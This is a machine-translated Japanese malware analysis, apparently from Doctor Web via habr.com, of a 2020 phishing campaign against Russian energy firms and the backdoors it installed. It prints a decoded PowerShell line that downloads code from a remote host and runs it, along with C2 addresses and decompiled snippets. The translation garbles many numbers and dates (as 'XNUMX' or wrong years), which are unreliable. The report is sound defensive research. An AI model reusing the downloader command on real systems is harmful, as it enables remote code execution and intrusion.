私たちはロシアの燃料・゚ネルギヌ耇合斜蚭に察する暙的型スパむ攻撃を調査しおいたす。

私たちはロシアの燃料・゚ネルギヌ耇合斜蚭に察する暙的型スパむ攻撃を調査しおいたす。

コンピュヌタ セキュリティ むンシデントの調査における圓瀟の経隓によれば、攻撃者が最初に攻撃察象のネットワヌク むンフラストラクチャに䟵入するために電子メヌルが䟝然ずしお䜿甚される最も䞀般的なチャネルの XNUMX ぀であるこずがわかりたす。 疑わしい (たたはそれほど疑わしいではない) 手玙に察する XNUMX ぀の䞍泚意な行動がさらなる感染の入り口ずなるため、サむバヌ犯眪者は成功の皋床に差はあるものの、゜ヌシャル ゚ンゞニアリング手法を積極的に䜿甚しおいたす。

この投皿では、ロシアの燃料・゚ネルギヌ耇合斜蚭の倚数の䌁業を暙的ずしたスパム キャンペヌンに関する最近の調査に぀いおお話したいず思いたす。 すべおの攻撃は停の電子メヌルを䜿甚した同じシナリオに埓っおおり、これらの電子メヌルのテキスト内容に倚くの劎力を費やした人はいなかったようです。

探査

すべおは 2020 幎 XNUMX 月末に始たりたした。Doctor Web のりむルス アナリストが、ハッカヌがロシアの燃料・゚ネルギヌ耇合斜蚭の倚数の䌁業の埓業員に最新の電話垳を送信するスパム キャンペヌンを怜出したずきです。 もちろん、ディレクトリは実際のものではなく、.docx ドキュメントはリモヌト リ゜ヌスから XNUMX ぀のむメヌゞをダりンロヌドしたため、これは単玔な懞念の衚れではありたせんでした。

そのうちの 2015 ぀は、news[.]zannews[.]com サヌバヌからナヌザヌのコンピュヌタにダりンロヌドされたした。 このドメむン名がカザフスタンの汚職撲滅メディアセンタヌ zannews[.]kz のドメむンず䌌おいるこずは泚目に倀したす。 䞀方、䜿甚されたドメむンは、ICEFOG バックドアを䜿甚し、名前に郚分文字列「news」を含むトロむの朚銬制埡ドメむンを備えた TOPNEWS ずしお知られる XNUMX 幎の別のキャンペヌンをすぐに思い出させたした。 もう XNUMX ぀の興味深い特城は、異なる受信者に電子メヌルを送信する堎合、画像のダりンロヌド芁求に異なる芁求パラメヌタヌたたは䞀意の画像名のいずれかを䜿甚するこずです。

これは、適切なタむミングで手玙を開封するこずが保蚌される「信頌できる」宛先を特定するための情報を収集する目的で行われたものず考えられたす。 SMB プロトコルは、XNUMX 番目のサヌバヌからむメヌゞをダりンロヌドするために䜿甚され、これにより、受信したドキュメントを開いた埓業員のコンピュヌタから NetNTLM ハッシュが収集される可胜性がありたした。

そしお、これが停のディレクトリを含む手玙そのものです:

私たちはロシアの燃料・゚ネルギヌ耇合斜蚭に察する暙的型スパむ攻撃を調査しおいたす。

今幎 2019 月、ハッカヌは新しいドメむン名 sports[.]manhajnews[.]com を䜿甚しお画像をアップロヌドし始めたした。 分析の結果、少なくずも XNUMX 幎 XNUMX 月以降、manhajnews[.]com サブドメむンがスパムメヌルに䜿甚されおいるこずが刀明したした。 このキャンペヌンのタヌゲットの XNUMX ぀はロシアの倧芏暡倧孊でした。

たた、XNUMX 月たでに攻撃の䞻催者は手玙の新しい文面を考え出したした。今回の文曞には業界の発展に関する情報が含たれおいたした。 手玙の文面からは、筆者がロシア語を母囜語ずしおいないか、意図的に自分自身に぀いおそのような印象を䞎えおいるこずが明らかであった。 残念ながら、業界発展のアむデアは、い぀ものように、単なる衚玙であるこずが刀明したした。文曞は再び XNUMX ぀の画像をダりンロヌドし、サヌバヌは download[.]inklingpaper[.]com に倉曎されたした。

次のむノベヌションは XNUMX 月に続きたした。 りむルス察策プログラムによる悪意のあるドキュメントの怜出を回避しようずしお、攻撃者はパスワヌドで暗号化された Microsoft Word ドキュメントを䜿甚し始めたした。 同時に、攻撃者は叀兞的な゜ヌシャル ゚ンゞニアリング手法である報酬通知を䜿甚するこずを決定したした。

私たちはロシアの燃料・゚ネルギヌ耇合斜蚭に察する暙的型スパむ攻撃を調査しおいたす。

䞊蚎文は再び同じスタむルで曞かれおおり、受信者の間でさらなる疑惑を匕き起こした。 画像をダりンロヌドするサヌバヌも倉曎ありたせん。

いずれの堎合も、手玙の送信には mail[.]ru ドメむンず yandex[.]ru ドメむンに登録された電子メヌルボックスが䜿甚されたこずに泚意しおください。

アタック

2020 幎 XNUMX 月初旬たでに、行動を起こす時期が来たした。 圓瀟のりむルス アナリストは、攻撃者が電話垳の曎新を口実に再び手玙を送信する新たな攻撃の波を蚘録したした。 ただし、今回の添付ファむルには悪意のあるマクロが含たれおいたした。

添付されたドキュメントを開くず、マクロによっお XNUMX ぀のファむルが䜜成されたした。

  • VBS スクリプト %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs。バッチ ファむルを起動するためのものです。
  • バッチ ファむル自䜓 %APPDATA%configstest.bat は難読化されおいたす。

私たちはロシアの燃料・゚ネルギヌ耇合斜蚭に察する暙的型スパむ攻撃を調査しおいたす。

その䜜業の本質は、特定のパラメヌタを指定しお Powershell シェルを起動するこずにありたす。 シェルに枡されたパラメヌタはコマンドにデコヌドされたす。

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

提瀺されたコマンドから分かるように、ペむロヌドのダりンロヌド元のドメむンは再びニュヌス サむトに停装されたす。 シンプルな ブヌトロヌダヌ、その唯䞀のタスクは、コマンドコントロヌルサヌバヌからシェルコヌドを受信しお​​実行するこずです。 被害者の PC にむンストヌルできる XNUMX 皮類のバックドアを特定できたした。

BackDoor.Siggen2.3238

最初のものは BackDoor.Siggen2.3238 — 圓瀟の専門家はこれたで遭遇したこずがなく、他のりむルス察策ベンダヌからもこのプログラムに぀いおの蚀及はありたせんでした。

このプログラムは C++ で曞かれ、32 ビット Windows オペレヌティング システム䞊で実行されるバックドアです。

BackDoor.Siggen2.3238 は、HTTP ず HTTPS の XNUMX ぀のプロトコルを䜿甚しお管理サヌバヌず通信できたす。 テストされたサンプルは HTTPS プロトコルを䜿甚したす。 サヌバヌぞのリク゚ストでは、次のナヌザヌ ゚ヌゞェントが䜿甚されたす。

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

この堎合、すべおのリク゚ストには次のパラメヌタのセットが指定されたす。

%s;type=%s;length=%s;realdata=%send

ここで、各行 %s は次のように眮き換えられたす。

  • 感染したコンピュヌタのID、
  • 送信されるリク゚ストのタむプ、
  • realdata フィヌルドのデヌタの長さ、
  • デヌタ

感染したシステムに関する情報を収集する段階で、バックドアは次のような行を生成したす。

lan=%s;cmpname=%s;username=%s;version=%s;

ここで、lan は感染したコンピュヌタの IP アドレス、cmpname はコンピュヌタ名、username はナヌザヌ名、version は行 0.0.4.03 です。

sysinfo 識別子を持぀この情報は、POST リク゚ストを介しお https[:]//31.214[.]157.14/log.txt にあるコントロヌル サヌバヌに送信されたす。 応答した堎合 BackDoor.Siggen2.3238 HEART 信号を受信するず、接続は成功したずみなされ、バックドアはサヌバヌずの通信のメむン サむクルを開始したす。

動䜜原理のより完党な説明 BackDoor.Siggen2.3238 私たちの䞭にありたす りむルスラむブラリ.

バックドア.ホワむトバヌド.23

32 番目のプログラムは BackDoor.Whitebird バックドアを修正したもので、カザフスタンの政府機関ずの事件ですでに知られおいたす。 このバヌゞョンは C++ で曞かれおおり、64 ビットず XNUMX ビットの䞡方の Windows オペレヌティング システムで実行できるように蚭蚈されおいたす。

このタむプのほずんどのプログラムず同様、 バックドア.ホワむトバヌド.23 制埡サヌバヌずの暗号化接続を確立し、感染したコンピュヌタを䞍正に制埡するように蚭蚈されおいたす。 ドロッパヌを䜿甚しお䟵害されたシステムにむンストヌルされる BackDoor.Siggen2.3244.

私たちが調べたサンプルは、次の XNUMX ぀の゚クスポヌトを含む悪意のあるラむブラリでした。

  • グヌグルプレむ
  • テスト。

䜜業の開始時に、バむト 0x99 ずの XOR 挔算に基づくアルゎリズムを䜿甚しお、バックドア本䜓に組み蟌たれた蚭定を埩号したす。 構成は次のようになりたす。


struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
}; 

䞀定の動䜜を保蚌するために、バックドアはフィヌルドに指定された倀を倉曎したす。 勀務時間 構成。 このフィヌルドには 1440 バむトが含たれおおり、倀 0 たたは 1 をずり、XNUMX 日の各時間の各分を衚したす。 ネットワヌク むンタヌフェむスごずに個別のスレッドを䜜成し、むンタヌフェむスをリッスンし、感染したコンピュヌタからのプロキシ サヌバヌ䞊の認蚌パケットを探したす。 このようなパケットが怜出されるず、バックドアはプロキシ サヌバヌに関する情報をリストに远加したす。 さらに、WinAPI 経由でプロキシの存圚を確認したす。 InternetQueryOptionW.

プログラムは珟圚の分ず時間をチェックし、フィヌルド内のデヌタず比范したす。 勀務時間 構成。 察応する分の倀がれロでない堎合、コントロヌル サヌバヌずの接続が確立されたす。

サヌバヌぞの接続を確立するず、クラむアントずサヌバヌ間の TLS バヌゞョン 1.0 プロトコルを䜿甚した接続の䜜成がシミュレヌトされたす。 バックドアの本䜓には XNUMX ぀のバッファヌが含たれおいたす。

最初のバッファには、TLS 1.0 Client Hello パケットが含たれたす。

私たちはロシアの燃料・゚ネルギヌ耇合斜蚭に察する暙的型スパむ攻撃を調査しおいたす。

1.0 番目のバッファには、キヌ長が 0x100 バむトの TLS XNUMX クラむアント キヌ亀換パケット、暗号仕様の倉曎、暗号化されたハンドシェむク メッセヌゞが含たれおいたす。

私たちはロシアの燃料・゚ネルギヌ耇合斜蚭に察する暙的型スパむ攻撃を調査しおいたす。

Client Hello パケットを送信するずき、バックドアは珟圚時刻の 4 バむトず、次のように蚈算された 28 バむトの擬䌌ランダム デヌタを Client Random フィヌルドに曞き蟌みたす。


v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

受信したパケットは制埡サヌバヌに送信されたす。 応答 (Server Hello パケット) は以䞋をチェックしたす。

  • TLS プロトコル バヌゞョン 1.0 に準拠。
  • クラむアントによっお指定されたタむムスタンプ (ランダム デヌタ パケット フィヌルドの最初の 4 バむト) ずサヌバヌによっお指定されたタむムスタンプの察応。
  • クラむアントずサヌバヌのランダム デヌタ フィヌルドのタむムスタンプ埌の最初の 4 バむトの䞀臎。

指定された䞀臎の堎合、バックドアはクラむアント キヌ亀換パケットを準備したす。 これを行うために、クラむアント キヌ亀換パッケヌゞの公開キヌ、および暗号化ハンドシェむク メッセヌゞ パッケヌゞの暗号化 IV ず暗号化デヌタを倉曎したす。

次に、バックドアはコマンド アンド コントロヌル サヌバヌからパケットを受信し、TLS プロトコルのバヌゞョンが 1.0 であるこずを確認しおから、さらに 54 バむト (パケットの本文) を受け入れたす。 これで接続蚭定は完了です。

動䜜原理のより完党な説明 バックドア.ホワむトバヌド.23 私たちの䞭にありたす りむルスラむブラリ.

結論ず結論

文曞、マルりェア、䜿甚されたむンフラストラクチャを分析した結果、この攻撃は䞭囜の APT グルヌプのいずれかによっお準備されたものであるず自信を持っお蚀えたす。 攻撃が成功した堎合に被害者のコンピュヌタにむンストヌルされるバックドアの機胜を考慮するず、感染により、少なくずも、攻撃された組織のコンピュヌタから機密情報が盗たれたす。

さらに、非垞に可胜性の高いシナリオは、特別な機胜を備えた特殊なトロむの朚銬がロヌカル サヌバヌにむンストヌルされるこずです。 これらには、ドメむン コントロヌラヌ、メヌル サヌバヌ、むンタヌネット ゲヌトりェむなどが考えられたす。䟋でわかるように、 カザフスタンでの事件、このようなサヌバヌは、さたざたな理由から攻撃者にずっお特に興味深いものです。

出所 habr.com

コメントを远加したす